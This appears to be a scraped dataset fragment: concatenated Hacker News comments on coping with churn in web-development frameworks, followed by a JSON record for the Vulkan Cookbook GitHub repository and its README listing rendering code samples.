That's a new one for me...Clicked the link hoping this was a collaborative network for reputation reports on automobile drivers.I think this is the correct link:https://answers.microsoft.com/en-us/windows/forum/all/driver...Dead link.So: Closed-source, feature driven rather than value driven and a walled garden on all sides?Seems like they're almost there.(And I say that as someone who likes the product.)Pretty much all of your complaints are self-inflicted by chasing bleeding edge tech. You don't have to do this.> I've been burnt before using what was seen once as well-established and polished but when I tried it, it was in total decay (meteorJS).You tried one older tech and gave up, while you're constantly re-upping on newer stuff without questioning that?Also it sounds like you're only describing javascript. Javascript is kind of its own thing with its own issues/etc.. Try a different language. You'll always have to use JS for web development, but it doesn't have to be your whole world, either.Don't listen to all these people talking about various trendy frameworks, react, preact, typescript, hypescript and sh*tescript. Just keep it simple.jest, mocha, jasmine, karma...why do I need to write unit tests, my code is freaking perfect \\sIt's just pure cargo culting, most people don't know what they're talking about. You would be surprised how many people in front end don't even know that typescript has to be compiled into javascript.It\u2019s easy: Pick tools you like a stick with them. There are no perfect tools/solutions out there. Only different flavours of compromises. So pick the flavour you like and master it. I picked React and Typescript. Perfect for me. I see no reason to pick anything else. So that gives me the long term stability needed to be productive.I cope by ignoring the hype and focusing on technical problems that I personally find interesting. There was a time when I followed the in-crowd and learned whatever framework happened to be flavor-of-the-month at the time, but I just don't care anymore. Yes, there are certain jobs that require you know the latest trendy tools, but there are a lot of jobs that don't.What you're observing is not the rise and fall of best practice and good engineering. All you're seeing is the hype cycle.Best practice and good engineering in web dev is the same as it is in any other software field: the best stack is the one you know cold.Unfortunately, there are many popular stacks, and all of them have something to say about all the others. And 80% of learning materials for any given stack aren't from official sources, but are instead blog posts and videos and tweets from tech influencers. When they parrot those same criticisms, it lends the air of a grassroots shifting of the whole community.The fact of the matter is that despite the huge levels of hype flux, large, popular, stable apps are still being made with technology \"boring\" tech.Despite SPAs, rails and Django apps are still built rendering server side templates and sprinkling jQuery where necessary. Despite GraphQL, REST APIs are still the state of the art for most APIs. Despite kubernetes and docker, many apps are still deployed to heroku or VPS providers.It can be intimidating for newcomers because it can be difficult to separate hype from fact. My advice is to pick something, the more boring the better, and know it cold and ignore all claims of its death.To address concerns about projects dying, that is pretty legitimate. 
Unfortunately webdevs deploy trusted code into a highly untrustworthy and antagonistic environment. New technologies do come to play and requires adapters and plugins to be written. I wouldn't worry about overall size of community as long as security issues are getting addressed.You\u2019re obviously still on a relatively shallow level of webdev craft.Once you get deeper, you don\u2019t have to \u201crelearn\u201d anything.You just embrace the only constant thing which is the change.And keep using the same basic ideas to deliver the product. Not caring about the labels under which the ideas are implemented today or whether it would be cosidered cool in 10 years.I cope by only using tech that has been battle tested, solves a problem and proven to last for a long time to come.Most people still use REST APIs. GraphQL is cool, sure. But it solves a very particular problem. Why use it if you don't need it? Same goes for old standards like SOAP. If it still works then no point in changing it. They all do pretty much the same thing anyway.I've not even heard of trpc. goes and check. It's only 2 years old, that's why. What problem does it even solve? Types? We have OpenAPI for that.From what I can see, new tech only become mainstream if it solves a problem. trpc may make things nicer to use, but since it doesn't solve a problem that's not already solved, it'll probably never get big enough to be mainstream.Compare this to Typescript. Its first version was 2012. I started using it around 2019. 7 years after it was released. Was it doing something new? No. It's bringing static type checking to JS. In fact, I would argue that it makes the language feels more similar to existing languages like C# and Java.Did it solve a problem? Definitely. Many people want static type checking. And here we are in a Typescript world.Same goes with SSR/SSG, hydration, routing, etc. They solve a very particular problem. If you don't have that problem, no point in using it. Most websites still uses PHP and work just fine.what is the endless cycles?\nthe hype to learn things that obsolete tomorrow?Typescript is good, also waiting until more libraries/frameworks had real typescript support was a smart move on my part.Different areas of the dev world appeal to different people, naturally, but as a web dev since that became a thing (1995), I take a contrasting view.The web is the most dynamic, most exciting space in software development right now and is likely to be so for the foreseeable future. It touches everyone, in every industry. Web interfaces and technologies are the most used languages on the planet, giving your work huge impact.Have there been changes in this newest area of computing? Of course! Typescript isn't \"controlled\" by MS. It's just the future version of JS, available today. It's tremendously exciting for anyone who works with big JS codebases. Electron and other ways of building desktop apps out of the same tools is also a huge leap forward and let's web devs make stuff that's as beautiful and exciting as traditional desktop apps, all of which are incompatible with each other and have huge proprietary libraries.Bare metal web components and Lit are able to replace outdated frameworks like Angular and React and this is a huge improvement, too. 
Finally, web sockets gives us an open two-way pipeline to communicate with multiple servers or clients without http.Taken together, these elements represent an exciting time in web development when we can deliver apps that are beautiful, well written, and easy to maintain. The time for web dev has never been better! But it might not be a good match for you if you prefer working on other kinds of code. I do like the ideas of webapps - that webapps can connect other services together or able to create 1 platform for \"every\" device.\n\nAh, The Platform.The web development ecosystem is constantly evolving because The Platform is also constantly evolving.I\u2019m not saying that all of the churn is strictly necessary or what it\u2019s not overwhelming, especially to beginners, and especially in hindsight.The churn is in response to the fact that managing a development ecosystem for The Platform is a hard and impermanent problem to solve.New solutions come about to address the complexity, but those have their own complexity that will eventually be addressed by another new solution. This can be frameworks and libraries, languages and tools, or alternative \u201cplatforms\u201d altogether.The reality is, most of the solutions available today are fine in their own respects. Plenty of real, production software is built on these technologies, even the \u201coutdated\u201d ones.Try out some solutions. Pick one that clicks with you. Build your thing. You\u2019ll learn valuable concepts. A lot of it will be transferable or analogous to other solutions you encounter in the future.Drugs and alcohol.My advice is pick a framework you can get on with (and has mass market adoption, look at developer surveys) and stick with it. This likely means Vue/ react, you don't need to worry about all these other ones for a little while if it's causing you stress. This space is maturing, react has remained a solid choice since I started working with it many years ago now (yes it has warts, but so do most alternatives).Regarding typescript, I think you'll need to get over your concerns if you want to remain in the web space. If you check any developer surveys it's only getting more popular. I doubht its going anywhere soon, and if it does the syntax will be likely be extremely similar, its a pretty natural way to add typing to JS.What was \"total decay\"?Bunch of blog posts saying you should not use it?SPA was not a mistake - it is just that people don't understand they could do static web page with interactivity sprinkled on it - it has use cases.I work on web dev and use bunch of \"x was a mistake\" tools and somehow deliver good quality software.Even if framework stops being actively developed it is plenty usable still. Unless there are of course serious security issues not fixable I could still stick with a framework.I do webdev as a hobby. Making random cool projects and sharing them on Github for everyone to enjoy. I don't expect to get financially compensated for my efforts though. The reason I keep it as a hobby is that the thoughts of doing stuff for fun, and then /working/ on the same material at a job is excessive and means your whole life is swamped in coding, which is unhealthy.There are many people who have 'went pro' and turned their hobby into a job, but I wouldn't be able to handle that. The thing about jobs is that you have to adhere to someone else's rules and schematics and work on things that don't excite you as a hobby would do. 
If possible, switch to doing code as a hobby and stop chasing jobs (which churn out code at breakneck speed and your code becomes vaporware within a month).My advice is this: improve yourself/your knowledge to the point then you see all those libraries/frameworks have common parts implemented from different angles and all are very subjective because the authors had personal opinions. Then you'll realize you don't have to chase everything, just those things which really matter to you. I can recommend watching Alan Kay's videos on YouTube and understand what Smalltalk was, what were things like HyperCard etc. I really see web and web frameworks as -- poor in some aspects, like meta-circularity, or quite strong, for example in multimedia support -- reincarnation of those earlier ideas from 60s and 70s.My take on the endless cycle of change is that I love the enthusiasm and passion still being poured into the field but I must be diligent in evaluating what is being presented before believing it. Whenever a new framework or tool comes to my attention I try to ask myself what problem is this solving and do I actually have that problem? Most solutions usually come with trade offs and the times where I have made the best decisions are always when I understand what I am gaining at the expense of what it costs me. I try to remember that every new thing tries, rightfully so, to put its best foot forward and if I fail to do my due diligence in evaluating its offerings compared to my needs that I am doing myself a disservice.I fully admit that I too sometimes find the noise of all the enthusiasm to be a bit taxing but I try to remind myself that I hear all the noise because I am excited about web dev. In the times where I am not tired of the noise I am seeking more and more of the latest and greatest. So I try to remind myself it\u2019s ok to not pay attention to every single thing; not knowing about one particular thing will not prohibit me from making great things with what I do know.It sounds like you are enjoying webdev so my advice is to do just that and remember that all the hype is just someone else\u2019s passion for webdev too.Front end development is particularly prone to the hype cycle. Other parts of the stack are a little more stable in their tooling. I personally believe this is because the front end ecosystem is comprised of more self taught and boot camp people. They\u2019re super excited to do development and live on hype, whereas other areas are still more likely to be classically trained computer scientists and engineers that are less hype prone.\n This is of course a super over generalization and you can find tons of exceptions but if you look at the industry overall this is why I see it happening.I started off doing web development back in the late 90s, at first using Frontpage, then progressing to HTML. In the early 2000s, I was writing PHP and using MySQL.I started doing web dev again around the Great Recession. Originally I was using CakePHP, but Microsoft offered my firm massive discounts on various licensing if we went all in on .NET.So all new things were written in C# ASP.net, and I honestly can\u2019t remember the specific framework.In the last decade, I had some on and off web projects. I remember using Angular. Then React. There were various build tools, minification configs, CSS frameworks. 
The deployment scripts just copied a bundle of files and threw them to a specific location on a machine.Anyway, the more interesting problems I solved in any kind of \u201cweb development\u201d was around scaling\u2026 using CDNs for assets, using load balancers, having an entire fleet of servers, staggered deployments, canaries, metrics, dashboards, monitors and alarms, etc.This is really what the complexity was. And a few times we dabbled in \u201cwrite once, run anywhere\u201d so we could share code on iOS and Android. It was really a function of, who are the staff engineers and do they prefer HTML, native stacks, or whatever framework,Having said all that, I never understood the endless complexity in the raw web stack. Too many frameworks, too much tooling, and they\u2019re optimizing for what exactly?My take is that the barrier to entry in the web space was always low. You don\u2019t need to really know data structures and algorithms to get started. And so with the influx of new people in the space, everyone has their tastes and preferences. But 90% of these use cases are not that different from the PHP and MySQL work I was doing. Except now there are entire industries around mastering whatever framework, youtube channels, etc etc. it\u2019s a variety of microcultures.Partly I think if you have experience in web dev, you learn to recognize which frameworks/technologies are worth pursuing and which are not.It's also worth noting, some of it comes down to personal preference and purpose of the project.If you're just dabbling, stick with something battle-tested, and if you aren't sure what that is, phone a friend. Or post on HN...IMO: the cycle largely doesn't matter and can be ignored... hear me out.Been a web dev since the 90s, on and off, since before Javascript was invented. Twenty years later, it's still largely HTML and CSS, with JS globbed on. Here's the thing: the web, by its very nature, is a mountain of hacks on top of hacks on top of hacks, the result of having way too many cooks in the kitchen with no recipe. It just evolved organically, messily, clobbering different use cases together over time, all through mutating the HTML DOM -- little more than a glorified rich text doc.Web dev is a craft wide as an ocean, shallow as a puddle. Whatever framework you use or don't use, at the end of the day you're just moving boxes/divs around and highlighting buttons and such. The complexity you see in the toolchain and frameworks is because JS and HTML are so barebones that you can't really do a lot of traditional software stuff with it easily, having to reinvent everything from routing to state management to basic network stuff... not to mention reinvent a backend. So each major tech company or small business or mid-sized SaaS provider sets out to solve some tiny part of it, either to make a name for themselves or to just make some internal workflow easier. The successful ones either see widespread adoption (React) or become part of the ECMAScript specs eventually (fetch, Web Components). And many companies try to invent their own version of an idealized backend, each having some 80% overlap with other major backends, but none that are 100% the best for all uses cases, so now you get to pick and choose from a hundred imperfect solutions rather than one best practice.But so what? It largely doesn't matter.Web dev has an incredibly low barrier to entry. Anybody can learn the basics in a few weeks, largely for free, and get a paying job with not much effort. 
AND it has a pretty low skill ceiling, unless you choose to specialize down a path of (say) DevOps or DB engineer or some backend stack, or start diving into one of the web-adjacent APIs (WASM, WebGL, Canvas). If you just focus on the frontend DOM, it doesn't really matter whether you use vanilla, jQuery, React, Angular, Vue, Svelte... it's all just HTML and JS in the end.This field has incredible turnover: in frameworks, yes, but also in developers themselves, in managers, in companies, in fashions. As you pointed out, yesterday's \"best practices\" are today's \"mistakes to avoid\". Culturally, all of it is ephemeral and so very little of it is mission-critical. Maybe if you're working at an SaaS or IaaS company, you have to plan for 10+ years. But most online businesses just need a fancy catalog or marketing page or knowledge base or whatever, and fundamentally those are just several pages of UIs with a sprinkling of business logic and intertwined states to manage. The challenges are usually in thinking through the architecture and tradeoffs, not necessarily implementing any one framework or another.At the end of the day, no matter which framework you use, they're still just making and mutating HTML. I can pretty much guarantee that whatever you write is going to be obsolete by the time it hits 1.0, because all the underlying packages and frameworks (and possibly languages and APIs) will have evolved by then. But that's OK. That just means your code can be as throwaway as the ecosystem itself... the standards aren't as high as in proper software engineering. You're just marking up a network-enabled Word document, and if something breaks, it's trivial to fix it and all your users will see the fix the next time they load your site. And two years from now, somebody will get paid to rewrite all of it anyway, using a technology you've never heard of.While this can be frustrating, it doesn't have to be... if you just accept that the work is by nature ephemeral, that it's all throwaway code, you don't need to be attached to it anymore. Plan the best you can for a couple years out and the rest isn't up to you. No matter what you do, it's going to be redone very soon. You're not building cathedrals, just sand castles.Alternatively, if you really hate this sort of UI-forward coding, you can also create your own systems of abstraction that architecturally separate business logic from UI code, with a purity of functions that can persist underlying API or framework changes. But then all you really end up doing is creating your own new framework. That's how the web got here in the first place. Everybody keeps trying to abstract away the limitations of the DOM and Javascript.And if you don't like the new shiny, don't chase the new shiny. PHP and Java work largely the same as they did years ago, and still power large portions of the web. If you don't want to ever touch the constantly-mutating frontend, find a company big enough to let you specialize in backend API design and development so you never have to touch HTML, CSS, or JS. If you like the somewhat shiny, just not the bleeding edge, you can totally do that. Just pick React and roll with it... it's already considered old and lame (meaning mature) by this point, so if you start out knowing you're choosing older tech, it won't matter as much that it's still old 2 years later. For the backend stack, there are also very mature technologies that have relatively stabilized. Who cares what the new kids on the block are doing? 
If you're not working at a multi-million dollar company that owns its own data centers and resells its architectures to other companies, nobody is really going to care all that much about your stack, because it's unlikely to be perfect to begin with and it's not going to survive turnover very long. Again, it's all ephemeral, and that's OK. Don't let the perfect be the enemy of the good. Learning to love the web is learning to love short-lived mediocrity. You're just speed-dating, not marrying a framework. It's all going to be thrown away in a couple years, and nobody will remember or care why you did what you did. That's OK. You won't remember or care either. Just move on then and do something new somewhere else... you're getting paid along the way, and hopefully enjoying yourself enough. Don't worry about the future so much. Nobody else in the web ecosystem does, lol.\n\nTypeScript is amazing though. I\u2019d sell my soul to Microsoft for TypeScript lol. Jokes aside, there are compile-to-JS languages that are really good and open source, like ReScript.\n\n> the main reason is that Microsoft controls it - in contrast with say Go or Rust where it's controlled by a foundation\n\nTo my knowledge, and according to the website, Go is effectively entirely controlled by Google, not a foundation.\n\nI don\u2019t have anything to do with web development (and detest web applications and the idea of browsers as an application runtime) but use TypeScript elsewhere - any comparison to CoffeeScript seems misplaced. TS at this point is simply far too popular and widely used industry-wide to disappear, whereas CoffeeScript was always niche.\n\nHonestly, it sounds like you need to take a vacation so these very common issues don\u2019t feel overpowering. \u201cEndless\u201d is the problem, not that the technology moves forward. You need to make space for yourself to exist outside of work, and carve out time to keep up with where the industry is going. What you\u2019re describing will lead to burnout because you\u2019re always comparing or second-guessing what you use and what you know against someone/something else.\n\nAnybody can sign up to OpenAI and mess with their Playground. Ask it to draw its neural net design in ASCII art.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PacktPublishing/Vulkan-Cookbook", "link": "https://github.com/PacktPublishing/Vulkan-Cookbook", "tags": ["vulkan", "vulkan-api", "vulkan-demos", "cpp"], "stars": 646, "description": "Code repository for Vulkan Cookbook by Packt", "lang": "C++", "repo_lang": "", "readme": "\n\n\n# Vulkan Cookbook\nThis is the code repository for [Vulkan Cookbook](https://www.packtpub.com/game-development/vulkan-cookbook?utm_source=github&utm_medium=repository&utm_campaign=9781786468154), published by [Packt](https://www.packtpub.com/). All the example workflows that are mentioned in the book are present in the package.\n\n## About the Book\nVulkan is the next generation graphics API released by the Khronos group. It is expected to be the successor to OpenGL and OpenGL ES, with which it shares some similarities, such as its cross-platform capabilities, programmable pipeline stages, and nomenclature. Vulkan is a low-level API that gives developers much more control over the hardware, but also adds new responsibilities such as explicit memory and resource management. 
In return, though, Vulkan is expected to be much faster.\n\n### Related Books\n\n* [Vulkan Programming [Video]](https://www.packtpub.com/application-development/vulkan-programming-video?utm_source=github&utm_medium=repository&utm_campaign=9781786460714)\n\n* [Learning Vulkan](https://www.packtpub.com/application-development/learning-vulkan?utm_source=github&utm_medium=repository&utm_campaign=9781786469809)\n\n* [Building an Unreal RTS Game: The Basics [Video]](https://www.packtpub.com/application-development/building-unreal-rts-game-basics-video?utm_source=github&utm_medium=repository&utm_campaign=9781787285279)\n\n### Suggestions and Feedback\n [Click here](https://docs.google.com/forms/d/e/1FAIpQLSe5qwunkGf6PUvzPirPDtuy1Du5Rlzew23UBp2S-P3wB-GcwQ/viewform) if you have any feedback or suggestions.\n\n
\n\n## Credits\n### Special thanks to the authors and developers of the following projects and resources:\n* [**tinyobjloader**](https://github.com/syoyo/tinyobjloader) - A single-header library for loading Wavefront OBJ files.\n* [**stb image**](https://github.com/nothings/stb) - A single-header library for loading image files (other libraries are also available).\n* [**Humus**](http://www.humus.name/index.php?page=Textures) - A large collection of cubemaps (and other resources).\n\n
\n\n## Please note!\n### Currently only the Windows operating system is supported. A Linux version is being prepared and should be ready soon.\n\n
\n\n# [Samples](./Samples/Source%20Files/)\n\n## [Chapter 11 - Lighting](./Samples/Source%20Files/11%20Lighting/)\n\n\n\n* ### [01 - Rendering a geometry with vertex diffuse lighting](./Samples/Source%20Files/11%20Lighting/01-Rendering_a_geometry_with_vertex_diffuse_lighting/main.cpp)\n\nSample showing how to implement a diffuse lighting algorithm calculated only at the geometry's vertices using vertex shaders.
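At the heart of the sample is the Lambert diffuse term. Below is a minimal plain-C++ sketch of the math the vertex shader evaluates; the `Vec3` helpers are illustrative assumptions, not types from the book's library.

```cpp
#include <algorithm>
#include <cmath>

// Minimal 3-component vector (an assumption for this sketch).
struct Vec3 { float x, y, z; };

float Dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }

Vec3 Normalize(Vec3 v) {
  float len = std::sqrt(Dot(v, v));
  return {v.x / len, v.y / len, v.z / len};
}

// Lambert diffuse term: intensity is proportional to the cosine of the angle
// between the surface normal and the direction towards the light, clamped so
// back-facing surfaces receive no light.
float DiffuseTerm(Vec3 normal, Vec3 toLight) {
  return std::max(Dot(Normalize(normal), Normalize(toLight)), 0.0f);
}
```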
\nLeft mouse button: rotate the scene\n\n\n\n* ### [02 - Rendering a geometry with fragment specular lighting](./Samples/Source%20Files/11%20Lighting/02-Rendering_a_geometry_with_fragment_specular_lighting/main.cpp)\n\nThis sample presents the Phong specular lighting algorithm implemented in vertex and fragment shaders.
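For reference, a plain-C++ sketch of the Phong specular term the fragment shader evaluates, reusing the `Vec3`, `Dot` and `Normalize` helpers from the diffuse sketch above (an illustration, not the book's code):

```cpp
// Phong specular term: reflect the light direction about the normal and
// compare it with the view direction; the exponent controls highlight size.
float SpecularTerm(Vec3 normal, Vec3 toLight, Vec3 toViewer, float shininess) {
  Vec3 n = Normalize(normal);
  Vec3 l = Normalize(toLight);
  float ndotl = Dot(n, l);
  // R = 2(N.L)N - L
  Vec3 r = Normalize({2 * ndotl * n.x - l.x,
                      2 * ndotl * n.y - l.y,
                      2 * ndotl * n.z - l.z});
  return std::pow(std::max(Dot(r, Normalize(toViewer)), 0.0f), shininess);
}
```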
\nLeft mouse button: rotate the scene\n\n\n\n* ### [03 - Rendering a normal mapped geometry](./Samples/Source%20Files/11%20Lighting/03-Rendering_a_normal_mapped_geometry/main.cpp)\n\nHere a normal mapping technique is presented and the model is lit using the specular lighting algorithm.
\nLeft mouse button: rotate the scene\n\n\n\n* ### [04 - Rendering a reflective and refractive geometry using cubemaps](./Samples/Source%20Files/11%20Lighting/04-Rendering_a_reflective_and_refractive_geometry_using_cubemaps/main.cpp)\n\nSample presenting how to use cubemaps to render a transparent geometry that both reflects and refracts the environment.
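The cubemap sampling directions come from the standard reflection and refraction formulas. A plain-C++ sketch, again reusing the `Vec3` helpers from the sketches above:

```cpp
// Reflection direction used to sample the cubemap: R = I - 2(N.I)N,
// with I the incident view direction and N the surface normal (unit length).
Vec3 Reflect(Vec3 i, Vec3 n) {
  float d = Dot(n, i);
  return {i.x - 2 * d * n.x, i.y - 2 * d * n.y, i.z - 2 * d * n.z};
}

// Refraction direction (Snell's law), eta = n1 / n2; returns a zero vector
// on total internal reflection.
Vec3 Refract(Vec3 i, Vec3 n, float eta) {
  float cosi = -Dot(n, i);
  float k = 1.0f - eta * eta * (1.0f - cosi * cosi);
  if (k < 0.0f) return {0, 0, 0};
  float s = eta * cosi - std::sqrt(k);
  return {eta * i.x + s * n.x, eta * i.y + s * n.y, eta * i.z + s * n.z};
}
```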
\nLeft mouse button: rotate the scene\n\n\n\n* ### [05 - Adding shadows to the scene](./Samples/Source%20Files/11%20Lighting/05-Adding_shadows_to_the_scene/main.cpp)\n\nIn this sample a basic shadow mapping algorithm is shown. In the first render pass a shadow map is generated. In the second render pass the scene is rendered and the data from the shadow map is used to check whether the geometry is lit or covered in shadow.
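The core of the second pass reduces to a depth comparison in the light's clip space; a minimal sketch (the bias value is a hypothetical tuning constant, not taken from the sample):

```cpp
// Second-pass shadow test: the fragment's depth, as seen from the light, is
// compared against the closest depth stored in the shadow map. The small bias
// is a typical tweak to avoid self-shadowing ("shadow acne").
bool InShadow(float depthFromLight, float shadowMapDepth) {
  const float bias = 0.005f;  // hypothetical tuning value
  return depthFromLight - bias > shadowMapDepth;
}
```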
\nLeft mouse button: rotate the scene
\nRight mouse button: move the light\n\n## [Chapter 12 - Advanced Rendering Techniques](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/)\n\n\n\n* ### [01 - Drawing a skybox](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/01-Drawing_a_skybox/main.cpp)\n\nHere it is shown how to draw a skybox, which simulates the background - objects seen in the distance and/or the sky.
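A common ingredient of this technique, sketched below: the skybox must appear infinitely distant, so the camera's translation is stripped from the view matrix before drawing it. The column-major `Mat4` alias is an assumption of this sketch; the book ships its own matrix helpers.

```cpp
#include <array>

// 4x4 matrix in column-major order (an assumption for this sketch).
using Mat4 = std::array<float, 16>;

// Keep the rotation of the view matrix but drop its translation (the last
// column in column-major layout), so camera movement never "reaches" the sky.
Mat4 SkyboxViewMatrix(Mat4 view) {
  view[12] = 0.0f;
  view[13] = 0.0f;
  view[14] = 0.0f;
  return view;
}
```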
\nLeft mouse button: look around\n\n* ### [02 - Drawing billboards using geometry shaders](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/02-Drawing_bilboards_using_geometry_shaders/main.cpp)\n\nThis sample presents a way of drawing sprites or billboards - flat, textured quads that are always facing the camera.
\nLeft mouse button: rotate the scene\n\n\n\n* ### [03 - Drawing particles using compute and graphics pipelines](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/03-Drawing_particles_using_compute_and_graphics_pipelines/main.cpp)\n\nHere an example of rendering particles is shown. Compute shaders are used to calculate the positions of all particles in the system. Particles are rendered as flat billboards (sprites).
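A sketch of how such a frame can be recorded with the Vulkan API. The handle names and the workgroup size of 64 are hypothetical, and synchronization and render pass management are only hinted at in comments:

```cpp
#include <vulkan/vulkan.h>

// One possible frame layout: first advance the simulation in a compute
// dispatch, then draw the updated particle buffer as billboards.
void RecordParticleFrame(VkCommandBuffer cmd,
                         VkPipeline computePipeline,
                         VkPipeline graphicsPipeline,
                         uint32_t particleCount) {
  // Each workgroup updates e.g. 64 particles; round the group count up.
  vkCmdBindPipeline(cmd, VK_PIPELINE_BIND_POINT_COMPUTE, computePipeline);
  vkCmdDispatch(cmd, (particleCount + 63) / 64, 1, 1);

  // A buffer memory barrier belongs here so the vertex stage sees the
  // positions written by the compute shader (omitted for brevity).

  // Drawing must happen inside a render pass (begin/end omitted).
  vkCmdBindPipeline(cmd, VK_PIPELINE_BIND_POINT_GRAPHICS, graphicsPipeline);
  vkCmdDraw(cmd, particleCount, 1, 0, 0);
}
```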
\nLeft mouse button: rotate the scene\n\n\n\n* ### [04 - Rendering a tessellated terrain](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/04-Rendering_a_tesselated_terrain/main.cpp)\n\nThis code sample shows one of the ways to draw a terrain. A complete graphics pipeline with all five programmable stages is used that tessellates the terrain near the camera to improve its complexity, with the level of detail fading away with increasing distance from the camera, and with a flat shading lighting algorithm.
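The level-of-detail falloff can be expressed as a simple distance-based function, as in this sketch; all tuning values are hypothetical:

```cpp
#include <algorithm>

// Distance-based tessellation level for terrain LOD: patches close to the
// camera get subdivided heavily, far patches stay coarse.
float TessellationLevel(float distanceToCamera) {
  const float maxLevel = 64.0f;   // densest subdivision near the camera
  const float minLevel = 1.0f;    // no subdivision far away
  const float falloff  = 100.0f;  // distance over which detail fades out
  float t = std::clamp(distanceToCamera / falloff, 0.0f, 1.0f);
  return maxLevel + t * (minLevel - maxLevel);  // linear fade between levels
}
```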
\nLeft mouse button: rotate the scene
\nMouse wheel: zoom in / zoom out\n\n\n\n* ### [05 - Rendering a fullscreen quad for postprocessing](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/05-Rendering_a_fullscreen_quad_for_postprocessing/main.cpp)\n\nSample presenting a fast and easy way to prepare an image postprocessing phase in a graphics pipeline - by using a fullscreen quad drawn already in clip space. An edge detection algorithm is shown as one of the examples of postprocessing techniques.\n\n\n\n* ### [06 - Using an input attachment for color correction postprocess effect](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/06-Using_input_attachment_for_color_correction_postprocess_effect/main.cpp)\n\nIn this code another postprocessing technique is shown that uses one of Vulkan's specific features - input attachments, which allow reading data from render targets (attachments) in the same render pass.
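For illustration, a sketch of how a postprocess subpass can declare an input attachment; the attachment indices are hypothetical (0 as the intermediate color target, 1 as the final color attachment):

```cpp
#include <vulkan/vulkan.h>

// The previous subpass's color output is read in the shader as an input
// attachment, while the subpass writes its result to another attachment.
VkAttachmentReference inputRef{0, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL};
VkAttachmentReference colorRef{1, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL};

VkSubpassDescription postprocessSubpass{
  0,                                // flags
  VK_PIPELINE_BIND_POINT_GRAPHICS,  // pipelineBindPoint
  1, &inputRef,                     // input attachments read in the shader
  1, &colorRef,                     // color attachment written by the subpass
  nullptr,                          // resolve attachments
  nullptr,                          // depth-stencil attachment
  0, nullptr                        // preserve attachments
};
```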
\nLeft mouse button: rotate the scene\n\n## [Other](./Samples/Source%20Files/Other/)\n\n\n\n* ### [01 - Creating a logical device](./Samples/Source%20Files/Other/01-Creating_Logical_Device/main.cpp)\n\nCode sample that shows basic Vulkan setup - instance creation, physical device enumeration and logical device creation.\n\n\n\n* ### [02 - Creating a swapchain](./Samples/Source%20Files/Other/02-Creating_Swapchain/main.cpp)\n\nHere a swapchain object is created, which allows us to render a scene directly to an application's window.\n\n\n\n* ### [03 - Using render passes](./Samples/Source%20Files/Other/03-Using_Render_Passes/main.cpp)\n\nThis example shows how to prepare a basic render pass - a description of attachments (render targets) needed to render a geometry.\n\n\n\n* ### [04 - Using a graphics pipeline](./Samples/Source%20Files/Other/04-Using_Graphics_Pipeline/main.cpp)\n\nSample showing how to create a graphics pipeline, set up its multiple parameters and use it to draw a scene.\n\n\n\n* ### [05 - Using combined image samplers](./Samples/Source%20Files/Other/05-Using_Combined_Image_Samplers/main.cpp)\n\nHere descriptor sets are introduced. They are required to set up an interface between an application and a pipeline and to provide images (textures) to shaders.\n\n\n\n* ### [06 - Using uniform buffers](./Samples/Source%20Files/Other/06-Using_Uniform_Buffers/main.cpp)\n\nAnother example of using descriptor sets, but this time it presents how to prepare transformation matrices and provide them to shaders.\n\n\n\n* ### [07 - Using push constants](./Samples/Source%20Files/Other/07-Using_Push_Constants/main.cpp)\n\nThis code sample presents a very fast and easy way to provide data to shaders - push constants. Though the amount of provided data cannot be too big, push constants are ideal for performing frequent updates.\n\n\n\n* ### [08 - Using tessellation shaders](./Samples/Source%20Files/Other/08-Using_Tessellation_Shaders/main.cpp)\n\nHere we can see how to create a graphics pipeline with tessellation control and evaluation shaders enabled, responsible for increasing the complexity of a rendered geometry.\n\n\n\n* ### [09 - Using geometry shaders](./Samples/Source%20Files/Other/09-Using_Geometry_Shaders/main.cpp)\n\nSample presenting how to use geometry shaders and generate new primitives instead of those drawn in an application.\n\n\n\n* ### [10 - Using compute shaders](./Samples/Source%20Files/Other/10-Using_Compute_Shaders/main.cpp)\n\nThis code sample shows how to create a compute pipeline - the second type of pipeline supported in the Vulkan API. It allows us to perform mathematical computations.\n\n\n\n* ### [11 - Drawing vertex normals](./Samples/Source%20Files/Other/11-Drawing_Vertex_Normals/main.cpp)\n\nHere a commonly used debugging technique is presented that uses geometry shaders to display normal vectors provided by the application.\n\n\n\n* ### [12 - Using depth attachments](./Samples/Source%20Files/Other/12-Using_Depth_Attachments/main.cpp)\n\nIn this example we can see how to set up a render pass, framebuffer and a graphics pipeline to use a depth attachment and enable the depth test during drawing.\n\n\n\n* ### [13 - Enabling alpha blending](./Samples/Source%20Files/Other/13-Enabling_Alpha_Blending/main.cpp)\n\nThis code sample shows how to enable alpha blending (transparency) in a graphics pipeline.
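The classic alpha blending setup for one color attachment looks roughly like the following sketch (not the sample's exact code):

```cpp
#include <vulkan/vulkan.h>

// Classic alpha blending for one color attachment:
//   result.rgb = src.rgb * src.a + dst.rgb * (1 - src.a)
const VkPipelineColorBlendAttachmentState kAlphaBlendState{
  VK_TRUE,                              // blendEnable
  VK_BLEND_FACTOR_SRC_ALPHA,            // srcColorBlendFactor
  VK_BLEND_FACTOR_ONE_MINUS_SRC_ALPHA,  // dstColorBlendFactor
  VK_BLEND_OP_ADD,                      // colorBlendOp
  VK_BLEND_FACTOR_ONE,                  // srcAlphaBlendFactor
  VK_BLEND_FACTOR_ZERO,                 // dstAlphaBlendFactor
  VK_BLEND_OP_ADD,                      // alphaBlendOp
  VK_COLOR_COMPONENT_R_BIT | VK_COLOR_COMPONENT_G_BIT |
  VK_COLOR_COMPONENT_B_BIT | VK_COLOR_COMPONENT_A_BIT  // colorWriteMask
};
```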
\nLeft mouse button: disable/enable blending
\n\n\n\n* ### [14 Drawing Single Fullscreen Triangle For Postprocessing](./Samples/Source%20Files/Other/14-Drawing_Single_Fullscreen_Triangle_For_Postprocessing/main.cpp)\n\nThis sample shows an alternative for performing a postprocessing with a quad (two triangles). Here a single triangle covering the whole screen is used to apply a grayscale effect.
\n\n
